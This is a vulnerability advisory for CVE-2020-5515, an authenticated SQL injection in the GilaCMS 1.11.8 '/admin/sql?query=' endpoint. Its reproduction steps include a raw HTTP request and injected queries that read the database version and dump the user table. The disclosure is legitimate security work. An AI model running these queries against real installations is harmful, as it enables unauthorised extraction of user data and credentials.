Headline
CVE-2020-5515: GilaCMS 1.11.8 – ‘/admin/sql?query=’ SQL Injection
Gila CMS 1.11.8 allows /admin/sql?query= SQL Injection.
Skip to content
Product Owner: GilaCMS
Application Name: GilaCMS 1.11.8
CVE ID: CVE-2020-5515
Type: Installable/Customer-Controlled Application
Application Release Date: 4th December,2019
Severity: High
Authentication: Required
Complexity: Easy
Vulnerability Name: SQL Injection in ‘/admin/sql?query=’
Vulnerability Explanation: SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
Verified In:
Firefox 71.0 (64-bit)
Windows 10
Hosted using XAMPP v3.2.4
Request:
GET /gilacms/admin/sql?query={INJECTION_POINT} HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: GSESSIONID=1za7iusvgawzjs936iegtmmtwfghbbp6ectnugwb0clvc0z37u
Upgrade-Insecure-Requests: 1
Steps to Reproduce:
1. Login to the GilaCMS application as admin.
2. Visit the following page: http://localhost/gilacms/admin/sql
3. Click on ‘Show Tables’. It takes us to http://localhost/gilacms/admin/sql?query=SHOW%20TABLES
4. The ‘query’ parameter is vulnerable to SQL injection (Inline Queries)
http://localhost/gilacms/admin/sql?query=SELECT VERSION(),USER()
http://localhost/gilacms/admin/sql?query=SELECT * FROM user
Vulnerable Code:
The ‘query’ parameter sent in the GET request (http://localhost/gilacms/admin/sql) is vulnerable to SQL Injection.
Reference:
Website: https://gilacms.com/
GitHub Repository: https://github.com/GilaCMS/gila
Download Version: https://github.com/GilaCMS/gila/releases/tag/1.11.8
Post navigation